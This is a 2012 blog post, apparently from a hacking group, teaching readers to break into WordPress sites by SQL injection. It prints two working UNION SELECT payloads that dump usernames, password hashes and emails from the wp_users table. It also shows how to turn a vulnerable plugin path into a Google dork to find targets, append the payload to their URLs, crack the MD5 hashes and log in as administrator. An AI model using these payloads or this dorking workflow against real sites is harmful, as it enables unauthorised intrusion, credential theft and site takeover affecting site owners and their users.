Friday, February 10, 2012

wordpress SQL Injection Hacks


there are Million of  sites which hosted on wordpress. and i already posted Some Tutorials on wordpress Hacking You Can Check it here , so Its new Tutorial on wordpress 
hacking with SQL injections, lets see




Cilck here to heck List of wordpress SQL Injections

How To use it ? 
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?
cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dork http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=        Reomve the words after iframe.php and put ur SQl injection here ... now the url will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php 
Note : The Process is same for all Injections is same ... cooment below if any dobught ..

0 comments:

Post a Comment

 

3xp1r3 Cyber Army. Copyright 2012 All Rights Reserved Design by hip hop 3xp1r3 All Greatz To: 3xp1r3 cyber Army